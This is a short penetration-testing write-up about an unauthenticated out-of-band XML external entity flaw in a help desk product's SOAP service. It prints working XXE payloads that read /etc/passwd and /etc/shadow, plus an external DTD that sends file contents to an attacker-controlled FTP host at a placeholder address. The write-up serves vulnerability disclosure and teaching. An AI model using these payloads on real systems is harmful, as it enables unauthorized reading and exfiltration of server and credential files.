SOAP- Based Unauthenticated Out-of-Band XML External Entity (OOB-XXE) in a Help Desk Software



While registering for an application, The assessment team identified wsdl file such as:


/services/ApiService?wsdl


We have used wsdler burp extension (https://portswigger.net/bappstore/594a49bb233748f2bc80a9eb18a2e08f) to parse the wsdl file as shown in below image:



Now, We sent this request to repeater and started fuzzing it for XXE. Firstly, we have started with Classic XXE payloads such as:



<?xml version=”1.0"?>

<!DOCTYPE data [

<!ELEMENT data (#ANY)>

<!ENTITY file SYSTEM “file:///etc/passwd”>]>

<data>&file;</data>



for file /etc/passwd

for file /etc/shadow

As you can see, from above two responses we can confirm the existence of vulnerability, but we can only enumerate file from server.


In order to extract the content of file, we need to emulate FTP-server.


We setup an xxe.dtd file on my server with following payload:



<!ENTITY % d SYSTEM “file:///etc/passwd”>

<!ENTITY % c “<!ENTITY rrr SYSTEM ‘ftp://x.x.x.x:2121/%d;'>">


Download and run the emulated ftp server from following link(Make sure about Port to listen):



<!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://x.x.x.x/xxe.dtd"> %asd; %c;]> <sessionId>&rrr;</sessionId>



Final XXE payload

As soon as you run the vulnerable request, you will start receiving content of /etc/passwd file on emulated FTP server as shown in below screenshot:



content of /etc/passwd on emulated FTP

References:


http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html?m=1
https://gist.github.com/staaldraad/01415b990939494879b4

© 2020 by SECMASTERS